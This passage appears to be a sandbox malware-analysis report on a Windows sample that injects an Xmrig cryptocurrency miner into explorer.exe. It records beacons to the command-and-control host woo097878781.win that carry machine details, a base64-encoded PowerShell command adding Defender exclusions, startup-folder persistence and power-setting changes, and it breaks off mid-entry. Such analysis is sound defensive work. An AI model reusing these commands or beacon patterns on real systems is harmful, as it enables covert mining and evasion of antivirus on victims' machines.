                                                                                                                                2024-12-16 12:41:31 UTC16384INData Raw: 2d 1d eb f8 0d 7d ce 2f 94 3f f2 35 3a b9 21 31 7b 87 c9 16 f4 be 48 f8 e3 86 aa a0 56 29 04 7a d6 29 0b 1c 03 3e 2a 16 cb 03 dc fe ff 09 74 2d 1c 67 62 25 9a ee e8 1e f9 96 49 19 7c 7b 18 b9 4f 06 75 78 45 22 03 5a 6b e3 47 5e a1 63 3e 33 37 9e 71 92 e8 71 e0 4e 9f 26 62 9c 07 8d 4a 17 ff 96 46 bc b7 ba 8a 12 18 fb b6 a9 8c 8f 30 00 cf c3 ca 22 76 ed 10 7c 75 0a f8 77 f7 c5 85 44 b0 94 22 82 16 33 a4 13 9c e3 dd 99 67 41 0c 32 d9 7b 3b a3 b1 51 e6 74 be dd 05 37 d6 49 99 57 f6 9a 3c 8d 40 57 e9 cd 56 7f a7 50 71 ce b9 d5 b4 c9 3e 41 0c 97 46 ae 4a d3 9c 22 ac 69 2e e5 47 2d 56 21 89 e6 b2 a3 0c c5 e0 69 13 c8 63 77 1a 76 0f ee a7 67 16 28 9b 77 91 f9 c6 84 5a fb ff 4b ed 78 5b 0a 27 a3 ac a9 a7 50 8d eb 9d 40 82 89 23 84 d3 62 d4 a6 ca bf 44 e8 48 d6 71
                                                                                                                                Data Ascii: -}/?5:!1{HV)z)>*t-gb%I|{OuxE"ZkG^c>37qqN&bJF0"v|uwD"3gA2{;Qt7IW<@WVPq>AFJ"i.G-V!icwvg(wZKx['P@#bDHq
                                                                                                                                2024-12-16 12:41:31 UTC16384INData Raw: d4 58 34 7d 27 78 c5 1d 63 d9 c5 2d 01 91 5e 81 d9 d9 94 e2 d9 72 e5 ff 0f a7 f0 25 1b ea 14 0c 13 26 40 fe a2 cb f2 83 50 c6 9e 87 a7 01 8d 10 11 b1 25 24 34 39 cc eb 0c 73 ef cc b5 7e 0b 31 c6 98 db e9 87 6d 13 c1 26 65 22 1f 79 84 4a 27 11 a9 61 c6 9a 20 d7 3a da 16 df e5 55 cf 00 9f a6 29 28 09 3e c1 eb f9 ad 62 0b 47 69 a0 7e 65 60 02 f8 3c ea 4e b2 95 82 92 c8 1c c8 27 82 3d 29 29 df c1 58 83 29 33 c2 b4 73 cf 16 b0 2c 1e 19 70 64 de 36 d1 de f2 6a 96 ed dd ce a9 64 3f b2 ca 5d 21 e4 f9 9c c4 50 45 94 04 ee 6e 4f c9 d8 4a 99 c5 96 b5 89 ab c0 eb 66 90 94 7d 2b 70 b0 2d ad 8b e2 b5 bc d0 ea 86 db 33 56 c6 cb af f3 f0 69 a7 27 59 87 1b f5 13 5b 5d 71 9c a4 8d 01 82 56 0f fa 88 db 1e e4 0e b3 70 15 d5 f6 d9 76 1e 1a 31 c1 cb 17 67 89 91 cc ea e7 f2 7e
                                                                                                                                Data Ascii: X4}'xc-^r%&@P%$49s~1m&e"yJ'a :U)(>bGi~e`<N'=))X)3s,pd6jd?]!PEnOJf}+p-3Vi'Y[]qVpv1g~
                                                                                                                                2024-12-16 12:41:31 UTC16384INData Raw: 09 59 63 b0 49 85 74 1f d0 0b 7f 5a b1 5a 4b a9 28 5f da e5 c1 b1 17 ca 66 33 f4 30 fd 1c d3 0d 6c fb 75 0c 21 27 eb 95 68 cc 61 64 ec 87 b7 5d bd 2f cb ce 42 12 6b 01 be e2 f0 b4 e4 30 a7 b5 2f a0 50 30 2e e0 d8 85 20 45 a5 c9 ae 67 c4 7f af 61 13 c8 c6 01 c8 18 25 5e cf 7b d4 a0 2c 3e e3 c5 85 44 b6 58 9e 0c a2 e5 1e 9d b9 97 ba fc 60 4f fd 8b c2 d7 26 13 e1 05 59 59 40 05 d8 e1 7a 5f d7 a4 02 39 6f 65 86 94 64 1a 32 97 e3 c9 24 14 15 8a e6 53 fa bb 97 e5 50 85 b7 02 4f 7a 47 be 3d e1 3e 03 07 78 79 1a 5f 90 72 ae 90 b5 c7 d5 fd f4 44 0e 9a 51 4d aa c2 cb 9f 8c a0 74 c9 99 1b 1f d9 bf e1 9b 32 1c d3 16 e8 64 1e 6b 9c 16 a8 cf fc 3b 16 d7 c5 b6 14 8a d9 03 0e 6d d8 48 d1 ee 24 50 2f 32 0f 5d 0a 01 95 66 a5 53 85 7e d9 af 7a 00 83 94 02 e5 02 fb 47 e6 0e
                                                                                                                                Data Ascii: YcItZZK(_f30lu!'had]/Bk0/P0. Ega%^{,>DX`O&YY@z_9oed2$SPOzG=>xy_rDQMt2dk;mH$P/2]fS~zG
                                                                                                                                2024-12-16 12:41:31 UTC16384INData Raw: 9c 8d 7a 6b b8 9f 99 eb d5 91 c0 c6 da 5e 51 85 93 57 34 91 c8 f7 ec 1e 86 4b 9d 97 3d 79 e6 de 7d 42 b0 3f 4c 86 c1 29 5e b0 1e 9f 2a b1 b1 06 c6 18 3b d9 5a fd 77 84 21 c8 3c ce b1 7d a9 d2 04 89 c3 3d 56 0c 08 cf ff e2 e7 23 93 22 58 e6 1c 95 56 77 5b ee 3b 26 07 28 59 94 49 53 f4 1f 4d 4d e7 1f 19 81 8a 98 09 10 ac b7 6d dd 87 bb 93 a4 f3 ad 05 2a ec 8b 1e 13 31 ff 86 fb aa d2 df 34 ac cb 25 2d e5 ba 7d 6f d5 6e 97 43 45 c0 fe 2b 4c 85 dc bf 7d 54 5e 12 74 d6 ab 5e 8b b8 b9 74 8b 17 5d a5 73 ba 0c 32 8f 51 36 4f 20 d4 db 8f be 77 24 02 da 39 04 33 76 ec e0 c7 88 77 4e 1f 63 3f 82 8e 24 39 02 32 ad 18 eb 9a 87 40 c4 aa 26 b4 b4 d4 00 ea bb b9 0e 35 5a cb 23 cb 1a eb 7e 3a 38 1f 9d fb 14 a1 e3 40 88 d7 a4 d7 5f 6e 0c 9f ba 2b 54 e4 80 be 0b be b2 04 0e
                                                                                                                                Data Ascii: zk^QW4K=y}B?L)^*;Zw!<}=V#"XVw[;&(YISMMm*14%-}onCE+L}T^t^t]s2Q6O w$93vwNc?$92@&5Z#~:8@_n+T


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.749839154.216.20.2434432868C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 12:42:18 UTC179OUTPOST /66/api/endpoint.php HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 549
                                                                                                                                Content-Type: application/json
                                                                                                                                Host: woo097878781.win
                                                                                                                                User-Agent: cpp-httplib/0.12.6
                                                                                                                                2024-12-16 12:42:18 UTC549OUTData Raw: 7b 22 69 64 22 3a 22 74 6a 61 6c 76 6a 68 74 67 78 6a 62 66 66 67 71 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 39 33 32 39 32 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 39 33 32 39 32 33 22 2c 22 67 70 75 22 3a 22 54 32 35 44 44 48 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 6f 30 39 37 38 37 38 37 38 31 2e 77 69 6e 2f 50 2e 74 78 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 43 3a
                                                                                                                                Data Ascii: {"id":"tjalvjhtgxjbffgq","computername":"932923","username":"932923","gpu":"T25DDH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:
                                                                                                                                2024-12-16 12:42:18 UTC264INHTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 16 Dec 2024 12:42:18 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                X-Powered-By: PHP/8.3.14
                                                                                                                                X-Robots-Tag: noindex, nofollow
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                2024-12-16 12:42:18 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 2{}0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                5192.168.2.749956154.216.20.243443
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 12:43:18 UTC179OUTPOST /66/api/endpoint.php HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 549
                                                                                                                                Content-Type: application/json
                                                                                                                                Host: woo097878781.win
                                                                                                                                User-Agent: cpp-httplib/0.12.6
                                                                                                                                2024-12-16 12:43:18 UTC549OUTData Raw: 7b 22 69 64 22 3a 22 74 6a 61 6c 76 6a 68 74 67 78 6a 62 66 66 67 71 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 39 33 32 39 32 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 39 33 32 39 32 33 22 2c 22 67 70 75 22 3a 22 54 32 35 44 44 48 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 6f 30 39 37 38 37 38 37 38 31 2e 77 69 6e 2f 50 2e 74 78 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 43 3a
                                                                                                                                Data Ascii: {"id":"tjalvjhtgxjbffgq","computername":"932923","username":"932923","gpu":"T25DDH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:
                                                                                                                                2024-12-16 12:43:18 UTC264INHTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 16 Dec 2024 12:43:18 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                X-Powered-By: PHP/8.3.14
                                                                                                                                X-Robots-Tag: noindex, nofollow
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                2024-12-16 12:43:18 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 2{}0


                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:07:40:56
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\ZppxPm0ASs.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Users\user\Desktop\ZppxPm0ASs.exe"
                                                                                                                                Imagebase:0x1fdd8150000
                                                                                                                                File size:89'640 bytes
                                                                                                                                MD5 hash:3C104350CC2661C345673E91ED672C4C
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2690759712.000001FDF2D60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1449279227.000001FDD9F41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1482651913.000001FDEBA61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:8
                                                                                                                                Start time:07:41:09
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABmAHIAbwBuAHQAZABlAHMAawBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAdABvAHAAcABlAGQALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAHMAUwB0AG8AcABwAGUAZAAuAGUAeABlAA==
                                                                                                                                Imagebase:0x7ff741d30000
                                                                                                                                File size:452'608 bytes
                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:9
                                                                                                                                Start time:07:41:09
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:10
                                                                                                                                Start time:07:41:12
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                Imagebase:0x7ff7fb730000
                                                                                                                                File size:496'640 bytes
                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:12
                                                                                                                                Start time:07:41:15
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
                                                                                                                                Imagebase:0x1c63d290000
                                                                                                                                File size:65'168 bytes
                                                                                                                                MD5 hash:A4EB36BAE72C5CB7392F2B85609D4A7E
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:13
                                                                                                                                Start time:07:41:15
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\powercfg.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                Imagebase:0x7ff7c5170000
                                                                                                                                File size:96'256 bytes
                                                                                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:14
                                                                                                                                Start time:07:41:15
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\powercfg.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                Imagebase:0x7ff7c5170000
                                                                                                                                File size:96'256 bytes
                                                                                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:15
                                                                                                                                Start time:07:41:15
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:16
                                                                                                                                Start time:07:41:15
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\powercfg.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                Imagebase:0x7ff7c5170000
                                                                                                                                File size:96'256 bytes
                                                                                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:17
                                                                                                                                Start time:07:41:15
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:18
                                                                                                                                Start time:07:41:15
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\powercfg.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                Imagebase:0x7ff7c5170000
                                                                                                                                File size:96'256 bytes
                                                                                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:19
                                                                                                                                Start time:07:41:15
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:20
                                                                                                                                Start time:07:41:15
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:21
                                                                                                                                Start time:07:41:15
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:explorer.exe
                                                                                                                                Imagebase:0x7ff70ffd0000
                                                                                                                                File size:5'141'208 bytes
                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:22
                                                                                                                                Start time:09:39:49
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs"
                                                                                                                                Imagebase:0x7ff67ccf0000
                                                                                                                                File size:170'496 bytes
                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:23
                                                                                                                                Start time:09:39:50
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\IsStopped.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\IsStopped.exe"
                                                                                                                                Imagebase:0x16d7f140000
                                                                                                                                File size:89'640 bytes
                                                                                                                                MD5 hash:3C104350CC2661C345673E91ED672C4C
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000017.00000002.1762727004.0000016D01AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Avira
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 29%, ReversingLabs
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:24
                                                                                                                                Start time:09:40:06
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
                                                                                                                                Imagebase:0x1cfd60f0000
                                                                                                                                File size:65'168 bytes
                                                                                                                                MD5 hash:A4EB36BAE72C5CB7392F2B85609D4A7E
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:25
                                                                                                                                Start time:09:40:07
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\powercfg.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                Imagebase:0x7ff7c5170000
                                                                                                                                File size:96'256 bytes
                                                                                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:26
                                                                                                                                Start time:09:40:07
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\powercfg.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                Imagebase:0x7ff7c5170000
                                                                                                                                File size:96'256 bytes
                                                                                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:27
                                                                                                                                Start time:09:40:07
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\powercfg.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                Imagebase:0x7ff7c5170000
                                                                                                                                File size:96'256 bytes
                                                                                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:28
                                                                                                                                Start time:09:40:07
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\powercfg.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                Imagebase:0x7ff7c5170000
                                                                                                                                File size:96'256 bytes
                                                                                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:29
                                                                                                                                Start time:09:40:07
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:30
                                                                                                                                Start time:09:40:07
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
